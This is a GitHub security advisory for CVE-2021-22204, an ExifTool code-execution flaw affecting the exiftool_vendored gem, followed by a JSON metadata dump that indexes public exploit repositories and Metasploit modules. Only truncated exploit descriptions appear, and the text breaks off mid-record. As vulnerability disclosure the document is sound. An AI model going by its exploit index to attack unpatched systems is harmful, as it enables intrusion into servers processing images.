ExifTool vulnerable to arbitrary code execution

2023-01-20T19:33:40

Description

### Impact Arbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads ### Patches ExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0). ### Workarounds No ### References https://twitter.com/wcbowling/status/1385803927321415687 https://nvd.nist.gov/vuln/detail/CVE-2021-22204 ### For more information If you have any questions or comments about this advisory: Open an issue in [exiftool_vendored.rb](https://github.com/exiftool-rb/exiftool_vendored.rb/issues)

Affected Software

CPE Name	Name	Version
	exiftool_vendored	12.25.0

{"id": "GHSA-Q95H-CQRV-8JV5", "vendorId": null, "type": "github", "bulletinFamily": "software", "title": "ExifTool vulnerable to arbitrary code execution", "description": "### Impact\nArbitrary code execution can occur when running `exiftool` against files with hostile metadata payloads\n\n### Patches\nExifTool has already been patched in version 12.24. `exiftool_vendored.rb`, which vendors ExifTool, includes this patch in [v12.25.0](https://github.com/exiftool-rb/exiftool_vendored.rb/releases/tag/v12.25.0).\n\n### Workarounds\nNo\n\n### References\nhttps://twitter.com/wcbowling/status/1385803927321415687\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-22204\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [exiftool_vendored.rb](https://github.com/exiftool-rb/exiftool_vendored.rb/issues)", "published": "2023-01-20T19:33:40", "modified": "2023-01-20T19:33:41", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://github.com/advisories/GHSA-q95h-cqrv-8jv5", "reporter": "GitHub Advisory Database", "references": ["https://github.com/exiftool-rb/exiftool_vendored.rb/security/advisories/GHSA-q95h-cqrv-8jv5", "https://twitter.com/wcbowling/status/1385803927321415687", "https://github.com/advisories/GHSA-q95h-cqrv-8jv5"], "cvelist": ["CVE-2021-22204"], "immutableFields": [], "lastseen": "2023-01-20T20:05:42", "viewCount": 15, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:13A3A278-4B9C-4E8F-A4FE-052E8C0204B2", "AKB:E9596BCB-BC29-4F41-9350-220EBD59D69D"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0912"]}, {"type": "cisa", "idList": ["CISA:D12090E3D1C36426271DE8458FFF31E4"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2021-22204"]}, {"type": "cve", "idList": ["CVE-2021-22204"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2663-1:BF6CA", "DEBIAN:DLA-2663-1:D8707", "DEBIAN:DSA-4910-1:4845B", "DEBIAN:DSA-4910-1:A1513"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2021-22204"]}, {"type": "exploitdb", "idList": ["EDB-ID:50532", "EDB-ID:50911"]}, {"type": "fedora", "idList": ["FEDORA:06290304CAE5", "FEDORA:DC90B309DE23", "FEDORA:E8F5F3053067"]}, {"type": "freebsd", "idList": ["955F377E-7BC3-11EC-A51C-7533F219D428"]}, {"type": "github", "idList": ["GHSA-4WHQ-R978-2X68"]}, {"type": "githubexploit", "idList": ["07BC6DDF-CE7C-5E5B-A4C0-E5C676C99705", "0965CC1C-18E7-5115-A63D-624003944775", "0BB93842-FE7D-5EB8-91F6-B24081F9F647", "289423D9-0706-5D51-A997-22A314D78ACE", "2DB805FE-17FB-5841-B802-028048B22820", "400AD2B4-EBCE-5934-92E0-C32C59BFA420", "4427DEE4-E1E2-5A16-8683-D74750941604", "4732718C-33AB-5303-8C25-8A0835A9464C", "48311C17-9A53-517D-9C70-3C1A4CDCA13A", "57168674-74D6-508B-9507-FBA738E00A78", "58E81731-017D-5CF4-8117-A7FAC5D6C97F", "796E09A7-CF7E-5007-BB24-683DB96A3905", "819D8E03-36B4-5710-9315-BD393F247181", "CAF1EB08-CE6F-59AB-918E-EABA63886936", "D1EFC5A3-3F5B-5A00-9A45-80777934AC77", "D8AA4FFA-7BD1-5ACF-9344-B486A698509F", "ECFA4525-3876-5304-9821-FE532A103C20", "F13B1CEC-8713-5A1E-8117-F6BED15AEA04"]}, {"type": "mageia", "idList": ["MGASA-2021-0259"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-GITLAB_EXIF_RCE-", "MSF:EXPLOIT-UNIX-FILEFORMAT-EXIFTOOL_DJVU_ANT_PERL_INJECTION-"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-2663.NASL", "DEBIAN_DSA-4910.NASL", "OPENSUSE-2021-707.NASL", "UBUNTU_USN-4987-1.NASL"]}, {"type": "osv", "idList": ["OSV:DLA-2663-1", "OSV:DSA-4910-1", "OSV:GHSA-4WHQ-R978-2X68", "OSV:GHSA-Q95H-CQRV-8JV5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162558", "PACKETSTORM:164768", "PACKETSTORM:164994", "PACKETSTORM:167038"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:3F66B870CB36C9E127B4D6BB5B5FF37B", "RAPID7BLOG:42058F70E3A275D52C950440A003EA6D", "RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0707-1"]}, {"type": "thn", "idList": ["THN:01284F0D93C66B65A40DE129C767426B"]}, {"type": "ubuntu", "idList": ["USN-4987-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-22204"]}, {"type": "veracode", "idList": ["VERACODE:30159"]}, {"type": "zdt", "idList": ["1337DAY-ID-36236", "1337DAY-ID-36997", "1337DAY-ID-37056", "1337DAY-ID-37713"]}]}, "score": {"value": 2.6, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "exiftool_vendored", "version": 12}]}, "epss": [{"cve": "CVE-2021-22204", "epss": "0.913230000", "percentile": "0.982930000", "modified": "2023-03-20"}], "vulnersScore": 2.6}, "_state": {"dependencies": 1674245149, "score": 1674245312, "affected_software_major_version": 1674247803, "epss": 1679355295}, "_internal": {"score_hash": "90c8dc9d9f92de78f50a125567889eb2"}, "affectedSoftware": [{"version": "12.25.0", "operator": "lt", "ecosystem": "RUBYGEMS", "name": "exiftool_vendored"}]}

{"githubexploit": [{"lastseen": "2022-07-21T06:56:51", "description": "# CVE-2021-22204 - Exiftool Remote Code Execution\n\n## Descriptio...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T09:11:27", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-21T00:41:01", "id": "0BB93842-FE7D-5EB8-91F6-B24081F9F647", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T15:49:29", "description": "# Gitlab-Exiftool-RCE\nOriginal repos : https://github.com/CsEnox...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T14:31:02", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-03-01T17:55:55", "id": "2DB805FE-17FB-5841-B802-028048B22820", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T23:16:44", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-03T16:36:02", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-05-03T22:04:44", "id": "07BC6DDF-CE7C-5E5B-A4C0-E5C676C99705", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T12:59:44", "description": "# ExifTool \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\r\n\r\n\u8fd9\u5e94\u8be5\u7b97\u662fCVE-2021-22204\u7684\u5206\u6790\u6587\u7ae0\uff0c\u4f46\u66f4\u591a\u50cf\u662f\u6211\u7684\u8349\u7a3f\u672c\uff0c\u5199\u6ee1\u4e86\u5f88\u591a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-29T13:41:35", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-06-24T09:01:37", "id": "289423D9-0706-5D51-A997-22A314D78ACE", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T09:40:08", "description": "### Vulnerable Version \n7.44 ~ 12.23\n\n### Reproduce\n\n```\n$...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-12T08:51:44", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-04-26T07:56:50", "id": "57168674-74D6-508B-9507-FBA738E00A78", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-31T21:21:16", "description": "CVE-2021-22204 (Im\u00e1genes maliocisas - reverse shell)\r\nEl uso de ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-11T19:02:28", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-07-31T16:37:35", "id": "CAF1EB08-CE6F-59AB-918E-EABA63886936", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-22T16:21:52", "description": "# CVE-2021-22204-exiftool\nPython exploit for the CVE-2021-22204 ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-21T11:07:19", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-01-22T14:21:22", "id": "4732718C-33AB-5303-8C25-8A0835A9464C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T12:00:54", "description": "# POC-CVE-2021-22204\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-21T00:14:52", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-08-02T23:18:41", "id": "796E09A7-CF7E-5007-BB24-683DB96A3905", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-11-03T20:30:41", "description": "# CVE-2021-22204\n\nAbout the vulnerability\n---\nImproper neutraliz...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-23T10:14:31", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-01-30T10:07:25", "id": "819D8E03-36B4-5710-9315-BD393F247181", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-07T08:34:57", "description": "# CVE-2021-22204-exiftool\nPython exploit for the CVE-2021-22204 ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T18:45:07", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-08-07T05:24:21", "id": "48311C17-9A53-517D-9C70-3C1A4CDCA13A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-26T08:33:41", "description": "# Exploit for CVE-2021-22204 (ExifTool) - Arbitrary Code Executi...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-16T22:49:47", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-03-26T05:55:53", "id": "D1EFC5A3-3F5B-5A00-9A45-80777934AC77", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-06T23:15:37", "description": "## Unauthenticated RCE on Gitlab version < 13.10.3\n\nUnauthentica...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-05T15:42:16", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2022-03-06T23:06:59", "id": "0965CC1C-18E7-5115-A63D-624003944775", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T18:28:42", "description": "# CVE-2021-22204\n\n## Description\n\nImproper neutralization of use...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T18:56:16", "type": "githubexploit", "title": "Exploit for Injection in Exiftool Project Exiftool", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-2204", "CVE-2021-22204"], "modified": "2022-03-31T18:27:27", "id": "58E81731-017D-5CF4-8117-A7FAC5D6C97F", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-30T23:25:45", "description": "### Vuln Impact\n\nAn issue has been discovered in GitLab CE/EE af...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-05T16:56:06", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-22205"], "modified": "2021-12-30T12:03:37", "id": "D8AA4FFA-7BD1-5ACF-9344-B486A698509F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:11:23", "description": "# Golang-CVE-2021-22205-POC\nA bare bones CVE-2021-22205 Gitlab R...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-25T12:47:27", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205", "CVE-2021-22204"], "modified": "2021-12-03T00:24:59", "id": "ECFA4525-3876-5304-9821-FE532A103C20", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:14:15", "description": "### Vuln Impact\r\n\r\nAn issue has been discovered in GitLab CE/EE ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 